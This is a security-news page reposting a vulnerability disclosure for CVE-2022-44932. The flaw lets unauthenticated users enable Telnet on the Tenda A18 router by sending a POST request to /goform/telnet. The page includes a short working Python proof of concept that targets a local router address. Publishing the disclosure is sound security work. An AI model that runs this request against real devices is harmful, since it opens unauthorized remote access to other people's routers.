Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44932: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An access control issue in Tenda A18 v15.13.07.09 allows unauthenticated attackers to access the Telnet service.

CVE
Open in Source
#vulnerability#auth#telnet

Permalink

Cannot retrieve contributors at this time

Tenda A18 V15.13.07.09 Unauthorized opening of tenlet service****Firmware information

  • Manufacturer’s address: https://www.tenda.com.cn/

  • Firmware download address: https://www.tenda.com.cn/download/detail-2760.html

Affected version

Vulnerability details

In /goform/telnet, the tenlet service can be started without authorization

Poc

import requests

url = “http://192.168.10.104/goform/telnet”

r = requests.post(url)

print(r.content)

You can see that the tenlet service is enabled

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE